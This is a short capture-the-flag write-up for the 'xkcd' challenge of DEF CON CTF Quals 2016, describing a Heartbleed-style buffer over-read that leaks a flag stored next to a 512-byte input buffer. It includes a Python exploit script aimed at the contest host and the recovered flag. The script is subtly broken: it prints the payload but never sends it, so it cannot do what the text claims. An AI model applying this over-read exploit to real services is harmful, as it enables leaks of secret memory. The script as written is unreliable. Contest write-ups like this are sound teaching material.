Лаборатория DEF CON CTF Quals 2016 - xkcd [1]

, 23 May 2016


Might want to read that comic as well... 1354

We have a binary and a service with this binary.
After quick inspection I've noticed a reference to heartbleed explanation xkcd comic.

Our input data are stored to globals buffer (in .bss segment) - which is 512 bytes long. 
And right after that buffer a flag_buffer (with data from flag file) is located.

So we could input  512 bytes input data to fully fill globals buffer and make it adjacent to the flag buffer.  
After that input the length (letters count)  512 + length of the flag.
I have empirically determined the length of the flag. Here is the final exploit:

import socket

s = socket.socket()
address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me'
port = 1354
s.connect((address, port))
payload = 'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%s LETTERS)\n' % ('A' * 512, 512 + 29)
print payload
data = s.recv(2048)
print data

And successfully got the flag.
The flag is: bl33ding h34rt5